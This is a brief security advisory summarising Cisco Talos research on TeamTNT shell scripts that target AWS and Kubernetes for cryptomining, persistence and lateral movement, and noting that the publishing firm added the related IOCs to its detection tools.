TeamTNT Threat Group targeting AWS and Cloud Services
Source: Cisco Talos
A blog published by Cisco Talos has recently analyzed modified versions of malicious shell scripts used by the cybercrime group, TeamTNT. These shell scripts have been modified by the malware author after they became aware that security researchers published the previous version of their scripts. These scripts are primarily designed to target Amazon Web Services (AWS) but could also run in on-premise, container or other forms of Linux instances.
Several of the TeamTNT payloads analyzed focus on cryptocurrency mining, persistence and lateral movement using techniques such as discovering and deploying onto all Kubernetes pods in a local network. There is also a script with login credentials for the primary distribution server, and another with an API key that might provide remote access to a tmate shared terminal session. Some of the TeamTNT scripts even contain defense evasion functions focused on disabling Alibaba cloud security tools. The focus on compromising modern cloud environments sets TeamTNT apart from many of the other cybercriminals encountered in the wild.
These cryptocurrency mining malware payloads use the processing power of compromised devices to generate currency for the threat actors. This can result in decreased performance and lifespan of devices infected with the malware.
As a result, Ascend Technologies has pushed the detection ability of the known IOCs across our EDR, SIEM, and anti-malware platforms. These IOCs include IPs and hash values which will give us the ability to detect and alert. As is the case with most malware, end users are targeted which makes maintaining a robust security posture highly important, including end-user training, to develop safe and secure internet browsing habits.